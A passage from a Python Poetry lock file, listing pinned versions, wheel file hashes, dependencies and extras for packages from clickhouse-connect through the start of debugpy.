{file = "clickhouse_connect-0.5.25-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:4851bb77eba7bbf494b3ee16f71a63cb890947ceddd3d71c2cf5a6635d482987"},
{file = "clickhouse_connect-0.5.25-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:75884207d0e09a9018be29ebe38c0e26be8d0ba96053cc181ee85c15b4ccd18d"},
{file = "clickhouse_connect-0.5.25-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:3d435e98126754ba82e23d20154ff427117227915ee84c7fea43a8d4444daed2"},
{file = "clickhouse_connect-0.5.25-cp37-cp37m-win32.whl", hash = "sha256:d900614c8a85c635b45c30d5de37d287cd0b20e44ef1f7f4b83b392bc82696c7"},
{file = "clickhouse_connect-0.5.25-cp37-cp37m-win_amd64.whl", hash = "sha256:1c47b203278df80ebd3eccb9087194f35dd666c2d19bca8148dc70d80b94502b"},
{file = "clickhouse_connect-0.5.25-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:6d60ec792e72b26184082ec86d4a32d1503acd6725b02bcb56c2980340129837"},
{file = "clickhouse_connect-0.5.25-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e050e67b9b2ce12ec3e7ce5c27d772e54d06dab578393c0760fd2fd8ea9eae57"},
{file = "clickhouse_connect-0.5.25-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e78c9b398abc683f003ed5d3013f2b35d692b8d1a9f1a40dc41fc9fa29304b58"},
{file = "clickhouse_connect-0.5.25-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:805a0494c8a3f4b37f38b33bdf6daeb43ea4165c3d5916e0467a4811f7a1efc6"},
{file = "clickhouse_connect-0.5.25-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:62e2da6c3971bc3cfec3dc0430318f38d061ffbdd4eb122e616a2f1aafc6e5c9"},
{file = "clickhouse_connect-0.5.25-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b7dbccfc5a7b238c7e927fb159b95f8ab2970ca0fd4ea39c813be4d10d2799cd"},
{file = "clickhouse_connect-0.5.25-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:6b9e4d0367f99471e865af55865fe300ccbf6e1d9fa070e1e0048c0f33d1ac2c"},
{file = "clickhouse_connect-0.5.25-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:f5bf565a45fb52c5b7e9a96913cda4012c1de1407bbab165378e32c6c946bf0d"},
{file = "clickhouse_connect-0.5.25-cp38-cp38-win32.whl", hash = "sha256:a08ead36c61ac28ce44a0f202acbd594e818be7640d6c972a33a1ebae72e6770"},
{file = "clickhouse_connect-0.5.25-cp38-cp38-win_amd64.whl", hash = "sha256:0db04a7433d1616f88eaa33b5c5884f7d367d087774a058712a2a6075ac1b4fb"},
{file = "clickhouse_connect-0.5.25-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:dd7ffbf42a97a4344b82b934d27749fd8296bb18b29a295c249b5d9a774ad122"},
{file = "clickhouse_connect-0.5.25-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:b51c174621c1de9ae03acd31fbd258e51a1760ae39b4c9ffbaec4a38e19e1545"},
{file = "clickhouse_connect-0.5.25-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a59d3d84fccfb831b19a96503fcaf1f6387b49f561d38bf3549fe917a372cc68"},
{file = "clickhouse_connect-0.5.25-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8335abab878fb166494bb9e68bb7d14a7325f96fb656d3f77d7a23668fb67a2f"},
{file = "clickhouse_connect-0.5.25-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a0a53d30cc50350efd82ad492a5b5597dedd6b79b19cfd2fe4331eac756f4aeb"},
{file = "clickhouse_connect-0.5.25-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:234579a907e43522c08f1ab9a199d44f7177d7a3755a43669143b237daa026a1"},
{file = "clickhouse_connect-0.5.25-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:93486291893605a0c8884db98e6306f61720fdbe4b1bed5b57cc0daa69cb18c9"},
{file = "clickhouse_connect-0.5.25-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:538025c3e10a387c0fe41b687c3421b98070a7f07d07ca88d7cc0d8aed7650f1"},
{file = "clickhouse_connect-0.5.25-cp39-cp39-win32.whl", hash = "sha256:38051bf7bd6003c0763561214530eef49dc194b062d6bf7faca708f42a5dbf63"},
{file = "clickhouse_connect-0.5.25-cp39-cp39-win_amd64.whl", hash = "sha256:3618a75a1f2c286e808b1d003ee3956bbf2a762ed36fee5f2a3e2e2096fb37ba"},
{file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:2170ba71ad154e9af1f09efd6acaf257b8c1346aeaaf57ae9cac7aa5778bff2c"},
{file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c846104f4e399e50008324c6ae66c3ef45ac4137a67ccaacdd3afe7f2667b05a"},
{file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:697e7c6ea239666aa2695a03787e4fff0c18cb829eb50086f929cf22cc455c7a"},
{file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7b093fc58104b1afe5f968394acaa9b665746564e1ed0c7d8ee5aea7a7a2331b"},
{file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:4b80e15bff634c4d6a895316b73843f41208d9e22e7e0039e417c79ead5ec906"},
{file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:ce9cd94d0d9e022e71cd121555f07c28ad2dbda431e1caf2174ce89a9d792151"},
{file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9fec43568dd0424deb9dcc74a804addd91f7119367a4ae77796c59656ba22be9"},
{file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5c5bdc7895b05f0a64956b6b4a29da3882a9b805e1d9e0025a061c46791674f3"},
{file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:00b54674d9af736f828c438776b7f11e80aecc95a3b763971df20d1537942408"},
{file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:401aa544255f15d6350934db59e6e0b9f1ddc866ccea41803973579725223aea"},
{file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c0a91e08f8563b8710b03c4a3696ba91fa3b0e475aa964a3169f201243f45d76"},
{file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:af191fc8ecaa544e065257c99cd1d7f49d62c191d23adb78fd34182525ea2f8f"},
{file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ef6cb5437c18e7588d6c3d7f4df6c8cdd883c30f82f8ec4f199cdcea63d189e4"},
{file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d5f84058209fbab8119835d9dd475ca4c3a246263d1965f0e7c624bae020cfad"},
{file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:b0a12c57233c85edd1a03d7bd153ef68b5392d500d8a1cf21de8cb5698c57481"},
]
[package.dependencies]
certifi = "*"
lz4 = "*"
pytz = "*"
urllib3 = ">=1.26"
zstandard = "*"
[package.extras]
arrow = ["pyarrow"]
numpy = ["numpy"]
orjson = ["orjson"]
pandas = ["pandas"]
sqlalchemy = ["sqlalchemy (>1.3.21,<1.4)"]
superset = ["apache-superset (>=1.4.1)"]
[[package]]
name = "cligj"
version = "0.7.2"
description = "Click params for commmand line interfaces to GeoJSON"
optional = true
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, <4"
files = [
{file = "cligj-0.7.2-py3-none-any.whl", hash = "sha256:c1ca117dbce1fe20a5809dc96f01e1c2840f6dcc939b3ddbb1111bf330ba82df"},
{file = "cligj-0.7.2.tar.gz", hash = "sha256:a4bc13d623356b373c2c27c53dbd9c68cae5d526270bfa71f6c6fa69669c6b27"},
]
[package.dependencies]
click = ">=4.0"
[package.extras]
test = ["pytest-cov"]
[[package]]
name = "codespell"
version = "2.2.6"
description = "Codespell"
optional = false
python-versions = ">=3.8"
files = [
{file = "codespell-2.2.6-py3-none-any.whl", hash = "sha256:9ee9a3e5df0990604013ac2a9f22fa8e57669c827124a2e961fe8a1da4cacc07"},
{file = "codespell-2.2.6.tar.gz", hash = "sha256:a8c65d8eb3faa03deabab6b3bbe798bea72e1799c7e9e955d57eca4096abcff9"},
]
[package.extras]
dev = ["Pygments", "build", "chardet", "pre-commit", "pytest", "pytest-cov", "pytest-dependency", "ruff", "tomli", "twine"]
hard-encoding-detection = ["chardet"]
toml = ["tomli"]
types = ["chardet (>=5.1.0)", "mypy", "pytest", "pytest-cov", "pytest-dependency"]
[[package]]
name = "cohere"
version = "4.32"
description = ""
optional = true
python-versions = ">=3.7,<4.0"
files = [
{file = "cohere-4.32-py3-none-any.whl", hash = "sha256:b5ab3509a34c20d51b246e38eb64adc839c8bc131c41ed92ec3613998df9a8e0"},
{file = "cohere-4.32.tar.gz", hash = "sha256:3807747be984f211dce911c1335bd713af2ac2b70f729678381e6ff6e450e681"},
]
[package.dependencies]
aiohttp = ">=3.0,<4.0"
backoff = ">=2.0,<3.0"
fastavro = {version = "1.8.2", markers = "python_version >= \"3.8\""}
importlib_metadata = ">=6.0,<7.0"
requests = ">=2.25.0,<3.0.0"
urllib3 = ">=1.26,<3"
[[package]]
name = "colorama"
version = "0.4.6"
description = "Cross-platform colored terminal text."
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7"
files = [
{file = "colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6"},
{file = "colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44"},
]
[[package]]
name = "coloredlogs"
version = "15.0.1"
description = "Colored terminal output for Python's logging module"
optional = true
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
files = [
{file = "coloredlogs-15.0.1-py2.py3-none-any.whl", hash = "sha256:612ee75c546f53e92e70049c9dbfcc18c935a2b9a53b66085ce9ef6a6e5c0934"},
{file = "coloredlogs-15.0.1.tar.gz", hash = "sha256:7c991aa71a4577af2f82600d8f8f3a89f936baeaf9b50a9c197da014e5bf16b0"},
]
[package.dependencies]
humanfriendly = ">=9.1"
[package.extras]
cron = ["capturer (>=2.4)"]
[[package]]
name = "comm"
version = "0.1.4"
description = "Jupyter Python Comm implementation, for usage in ipykernel, xeus-python etc."
optional = false
python-versions = ">=3.6"
files = [
{file = "comm-0.1.4-py3-none-any.whl", hash = "sha256:6d52794cba11b36ed9860999cd10fd02d6b2eac177068fdd585e1e2f8a96e67a"},
{file = "comm-0.1.4.tar.gz", hash = "sha256:354e40a59c9dd6db50c5cc6b4acc887d82e9603787f83b68c01a80a923984d15"},
]
[package.dependencies]
traitlets = ">=4"
[package.extras]
lint = ["black (>=22.6.0)", "mdformat (>0.7)", "mdformat-gfm (>=0.3.5)", "ruff (>=0.0.156)"]
test = ["pytest"]
typing = ["mypy (>=0.990)"]
[[package]]
name = "coverage"
version = "7.3.2"
description = "Code coverage measurement for Python"
optional = false
python-versions = ">=3.8"
files = [
{file = "coverage-7.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d872145f3a3231a5f20fd48500274d7df222e291d90baa2026cc5152b7ce86bf"},
{file = "coverage-7.3.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:310b3bb9c91ea66d59c53fa4989f57d2436e08f18fb2f421a1b0b6b8cc7fffda"},
{file = "coverage-7.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f47d39359e2c3779c5331fc740cf4bce6d9d680a7b4b4ead97056a0ae07cb49a"},
{file = "coverage-7.3.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:aa72dbaf2c2068404b9870d93436e6d23addd8bbe9295f49cbca83f6e278179c"},
{file = "coverage-7.3.2-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:beaa5c1b4777f03fc63dfd2a6bd820f73f036bfb10e925fce067b00a340d0f3f"},
{file = "coverage-7.3.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:dbc1b46b92186cc8074fee9d9fbb97a9dd06c6cbbef391c2f59d80eabdf0faa6"},
{file = "coverage-7.3.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:315a989e861031334d7bee1f9113c8770472db2ac484e5b8c3173428360a9148"},
{file = "coverage-7.3.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:d1bc430677773397f64a5c88cb522ea43175ff16f8bfcc89d467d974cb2274f9"},
{file = "coverage-7.3.2-cp310-cp310-win32.whl", hash = "sha256:a889ae02f43aa45032afe364c8ae84ad3c54828c2faa44f3bfcafecb5c96b02f"},
{file = "coverage-7.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:c0ba320de3fb8c6ec16e0be17ee1d3d69adcda99406c43c0409cb5c41788a611"},
{file = "coverage-7.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ac8c802fa29843a72d32ec56d0ca792ad15a302b28ca6203389afe21f8fa062c"},
{file = "coverage-7.3.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:89a937174104339e3a3ffcf9f446c00e3a806c28b1841c63edb2b369310fd074"},
{file = "coverage-7.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e267e9e2b574a176ddb983399dec325a80dbe161f1a32715c780b5d14b5f583a"},
{file = "coverage-7.3.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2443cbda35df0d35dcfb9bf8f3c02c57c1d6111169e3c85fc1fcc05e0c9f39a3"},
{file = "coverage-7.3.2-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4175e10cc8dda0265653e8714b3174430b07c1dca8957f4966cbd6c2b1b8065a"},
{file = "coverage-7.3.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:0cbf38419fb1a347aaf63481c00f0bdc86889d9fbf3f25109cf96c26b403fda1"},
{file = "coverage-7.3.2-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:5c913b556a116b8d5f6ef834038ba983834d887d82187c8f73dec21049abd65c"},
{file = "coverage-7.3.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:1981f785239e4e39e6444c63a98da3a1db8e971cb9ceb50a945ba6296b43f312"},
{file = "coverage-7.3.2-cp311-cp311-win32.whl", hash = "sha256:43668cabd5ca8258f5954f27a3aaf78757e6acf13c17604d89648ecc0cc66640"},
{file = "coverage-7.3.2-cp311-cp311-win_amd64.whl", hash = "sha256:e10c39c0452bf6e694511c901426d6b5ac005acc0f78ff265dbe36bf81f808a2"},
{file = "coverage-7.3.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:4cbae1051ab791debecc4a5dcc4a1ff45fc27b91b9aee165c8a27514dd160836"},
{file = "coverage-7.3.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:12d15ab5833a997716d76f2ac1e4b4d536814fc213c85ca72756c19e5a6b3d63"},
{file = "coverage-7.3.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3c7bba973ebee5e56fe9251300c00f1579652587a9f4a5ed8404b15a0471f216"},
{file = "coverage-7.3.2-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fe494faa90ce6381770746077243231e0b83ff3f17069d748f645617cefe19d4"},
{file = "coverage-7.3.2-cp312-cp312-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f6e9589bd04d0461a417562649522575d8752904d35c12907d8c9dfeba588faf"},
{file = "coverage-7.3.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:d51ac2a26f71da1b57f2dc81d0e108b6ab177e7d30e774db90675467c847bbdf"},
{file = "coverage-7.3.2-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:99b89d9f76070237975b315b3d5f4d6956ae354a4c92ac2388a5695516e47c84"},
{file = "coverage-7.3.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:fa28e909776dc69efb6ed975a63691bc8172b64ff357e663a1bb06ff3c9b589a"},
{file = "coverage-7.3.2-cp312-cp312-win32.whl", hash = "sha256:289fe43bf45a575e3ab10b26d7b6f2ddb9ee2dba447499f5401cfb5ecb8196bb"},
{file = "coverage-7.3.2-cp312-cp312-win_amd64.whl", hash = "sha256:7dbc3ed60e8659bc59b6b304b43ff9c3ed858da2839c78b804973f613d3e92ed"},
{file = "coverage-7.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:f94b734214ea6a36fe16e96a70d941af80ff3bfd716c141300d95ebc85339738"},
{file = "coverage-7.3.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:af3d828d2c1cbae52d34bdbb22fcd94d1ce715d95f1a012354a75e5913f1bda2"},
{file = "coverage-7.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:630b13e3036e13c7adc480ca42fa7afc2a5d938081d28e20903cf7fd687872e2"},
{file = "coverage-7.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c9eacf273e885b02a0273bb3a2170f30e2d53a6d53b72dbe02d6701b5296101c"},
{file = "coverage-7.3.2-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d8f17966e861ff97305e0801134e69db33b143bbfb36436efb9cfff6ec7b2fd9"},
{file = "coverage-7.3.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b4275802d16882cf9c8b3d057a0839acb07ee9379fa2749eca54efbce1535b82"},
{file = "coverage-7.3.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:72c0cfa5250f483181e677ebc97133ea1ab3eb68645e494775deb6a7f6f83901"},
{file = "coverage-7.3.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:cb536f0dcd14149425996821a168f6e269d7dcd2c273a8bff8201e79f5104e76"},
{file = "coverage-7.3.2-cp38-cp38-win32.whl", hash = "sha256:307adb8bd3abe389a471e649038a71b4eb13bfd6b7dd9a129fa856f5c695cf92"},
{file = "coverage-7.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:88ed2c30a49ea81ea3b7f172e0269c182a44c236eb394718f976239892c0a27a"},
{file = "coverage-7.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:b631c92dfe601adf8f5ebc7fc13ced6bb6e9609b19d9a8cd59fa47c4186ad1ce"},
{file = "coverage-7.3.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:d3d9df4051c4a7d13036524b66ecf7a7537d14c18a384043f30a303b146164e9"},
{file = "coverage-7.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5f7363d3b6a1119ef05015959ca24a9afc0ea8a02c687fe7e2d557705375c01f"},
{file = "coverage-7.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2f11cc3c967a09d3695d2a6f03fb3e6236622b93be7a4b5dc09166a861be6d25"},
{file = "coverage-7.3.2-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:149de1d2401ae4655c436a3dced6dd153f4c3309f599c3d4bd97ab172eaf02d9"},
{file = "coverage-7.3.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:3a4006916aa6fee7cd38db3bfc95aa9c54ebb4ffbfc47c677c8bba949ceba0a6"},
{file = "coverage-7.3.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9028a3871280110d6e1aa2df1afd5ef003bab5fb1ef421d6dc748ae1c8ef2ebc"},
{file = "coverage-7.3.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:9f805d62aec8eb92bab5b61c0f07329275b6f41c97d80e847b03eb894f38d083"},
{file = "coverage-7.3.2-cp39-cp39-win32.whl", hash = "sha256:d1c88ec1a7ff4ebca0219f5b1ef863451d828cccf889c173e1253aa84b1e07ce"},
{file = "coverage-7.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:b4767da59464bb593c07afceaddea61b154136300881844768037fd5e859353f"},
{file = "coverage-7.3.2-pp38.pp39.pp310-none-any.whl", hash = "sha256:ae97af89f0fbf373400970c0a21eef5aa941ffeed90aee43650b81f7d7f47637"},
{file = "coverage-7.3.2.tar.gz", hash = "sha256:be32ad29341b0170e795ca590e1c07e81fc061cb5b10c74ce7203491484404ef"},
]
[package.dependencies]
tomli = {version = "*", optional = true, markers = "python_full_version <= \"3.11.0a6\" and extra == \"toml\""}
[package.extras]
toml = ["tomli"]
[[package]]
name = "cryptography"
version = "41.0.5"
description = "cryptography is a package which provides cryptographic recipes and primitives to Python developers."
optional = false
python-versions = ">=3.7"
files = [
{file = "cryptography-41.0.5-cp37-abi3-macosx_10_12_universal2.whl", hash = "sha256:da6a0ff8f1016ccc7477e6339e1d50ce5f59b88905585f77193ebd5068f1e797"},
{file = "cryptography-41.0.5-cp37-abi3-macosx_10_12_x86_64.whl", hash = "sha256:b948e09fe5fb18517d99994184854ebd50b57248736fd4c720ad540560174ec5"},
{file = "cryptography-41.0.5-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d38e6031e113b7421db1de0c1b1f7739564a88f1684c6b89234fbf6c11b75147"},
{file = "cryptography-41.0.5-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e270c04f4d9b5671ebcc792b3ba5d4488bf7c42c3c241a3748e2599776f29696"},
{file = "cryptography-41.0.5-cp37-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:ec3b055ff8f1dce8e6ef28f626e0972981475173d7973d63f271b29c8a2897da"},
{file = "cryptography-41.0.5-cp37-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:7d208c21e47940369accfc9e85f0de7693d9a5d843c2509b3846b2db170dfd20"},
{file = "cryptography-41.0.5-cp37-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:8254962e6ba1f4d2090c44daf50a547cd5f0bf446dc658a8e5f8156cae0d8548"},
{file = "cryptography-41.0.5-cp37-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:a48e74dad1fb349f3dc1d449ed88e0017d792997a7ad2ec9587ed17405667e6d"},
{file = "cryptography-41.0.5-cp37-abi3-win32.whl", hash = "sha256:d3977f0e276f6f5bf245c403156673db103283266601405376f075c849a0b936"},
{file = "cryptography-41.0.5-cp37-abi3-win_amd64.whl", hash = "sha256:73801ac9736741f220e20435f84ecec75ed70eda90f781a148f1bad546963d81"},
{file = "cryptography-41.0.5-pp310-pypy310_pp73-macosx_10_12_x86_64.whl", hash = "sha256:3be3ca726e1572517d2bef99a818378bbcf7d7799d5372a46c79c29eb8d166c1"},
{file = "cryptography-41.0.5-pp310-pypy310_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:e886098619d3815e0ad5790c973afeee2c0e6e04b4da90b88e6bd06e2a0b1b72"},
{file = "cryptography-41.0.5-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:573eb7128cbca75f9157dcde974781209463ce56b5804983e11a1c462f0f4e88"},
{file = "cryptography-41.0.5-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:0c327cac00f082013c7c9fb6c46b7cc9fa3c288ca702c74773968173bda421bf"},
{file = "cryptography-41.0.5-pp38-pypy38_pp73-macosx_10_12_x86_64.whl", hash = "sha256:227ec057cd32a41c6651701abc0328135e472ed450f47c2766f23267b792a88e"},
{file = "cryptography-41.0.5-pp38-pypy38_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:22892cc830d8b2c89ea60148227631bb96a7da0c1b722f2aac8824b1b7c0b6b8"},
{file = "cryptography-41.0.5-pp38-pypy38_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:5a70187954ba7292c7876734183e810b728b4f3965fbe571421cb2434d279179"},
{file = "cryptography-41.0.5-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:88417bff20162f635f24f849ab182b092697922088b477a7abd6664ddd82291d"},
{file = "cryptography-41.0.5-pp39-pypy39_pp73-macosx_10_12_x86_64.whl", hash = "sha256:c707f7afd813478e2019ae32a7c49cd932dd60ab2d2a93e796f68236b7e1fbf1"},
{file = "cryptography-41.0.5-pp39-pypy39_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:580afc7b7216deeb87a098ef0674d6ee34ab55993140838b14c9b83312b37b86"},
{file = "cryptography-41.0.5-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:fba1e91467c65fe64a82c689dc6cf58151158993b13eb7a7f3f4b7f395636723"},
{file = "cryptography-41.0.5-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:0d2a6a598847c46e3e321a7aef8af1436f11c27f1254933746304ff014664d84"},
{file = "cryptography-41.0.5.tar.gz", hash = "sha256:392cb88b597247177172e02da6b7a63deeff1937fa6fec3bbf902ebd75d97ec7"},
]
[package.dependencies]
cffi = ">=1.12"
[package.extras]
docs = ["sphinx (>=5.3.0)", "sphinx-rtd-theme (>=1.1.1)"]
docstest = ["pyenchant (>=1.6.11)", "sphinxcontrib-spelling (>=4.0.1)", "twine (>=1.12.0)"]
nox = ["nox"]
pep8test = ["black", "check-sdist", "mypy", "ruff"]
sdist = ["build"]
ssh = ["bcrypt (>=3.1.5)"]
test = ["pretend", "pytest (>=6.2.0)", "pytest-benchmark", "pytest-cov", "pytest-xdist"]
test-randomorder = ["pytest-randomly"]
[[package]]
name = "cssselect"
version = "1.2.0"
description = "cssselect parses CSS3 Selectors and translates them to XPath 1.0"
optional = true
python-versions = ">=3.7"
files = [
{file = "cssselect-1.2.0-py2.py3-none-any.whl", hash = "sha256:da1885f0c10b60c03ed5eccbb6b68d6eff248d91976fcde348f395d54c9fd35e"},
{file = "cssselect-1.2.0.tar.gz", hash = "sha256:666b19839cfaddb9ce9d36bfe4c969132c647b92fc9088c4e23f786b30f1b3dc"},
]
[[package]]
name = "dashvector"
version = "1.0.5"
description = "DashVector Client Python Sdk Library"
optional = true
python-versions = ">=3.7,<4.0"
files = [
{file = "dashvector-1.0.5-py3-none-any.whl", hash = "sha256:a79e5bdb0d6447706cbf3645d9f1d07fa8e280d74842491aaa54e74258def2d6"},
{file = "dashvector-1.0.5.tar.gz", hash = "sha256:2ee9a8c26699b9d978e7d84ff1cd92fa7ea5411c557ef5fb2a3fea02bd9999c4"},
]
[package.dependencies]
aiohttp = ">=3.1.0,<4.0.0"
grpcio = [
{version = ">=1.49.1", markers = "python_version >= \"3.11\""},
{version = ">=1.22.0", markers = "python_version < \"3.11\""},
]
numpy = "*"
protobuf = ">=3.8.0,<4.0.0"
[[package]]
name = "dataclasses-json"
version = "0.6.1"
description = "Easily serialize dataclasses to and from JSON."
optional = false
python-versions = ">=3.7,<4.0"
files = [
{file = "dataclasses_json-0.6.1-py3-none-any.whl", hash = "sha256:1bd8418a61fe3d588bb0079214d7fb71d44937da40742b787256fd53b26b6c80"},
{file = "dataclasses_json-0.6.1.tar.gz", hash = "sha256:a53c220c35134ce08211a1057fd0e5bf76dc5331627c6b241cacbc570a89faae"},
]
[package.dependencies]
marshmallow = ">=3.18.0,<4.0.0"
typing-inspect = ">=0.4.0,<1"
[[package]]
name = "debugpy"
version = "1.8.0"
description = "An implementation of the Debug Adapter Protocol for Python"
optional = false
python-versions = ">=3.8"
files = [
{file = "debugpy-1.8.0-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:7fb95ca78f7ac43393cd0e0f2b6deda438ec7c5e47fa5d38553340897d2fbdfb"},
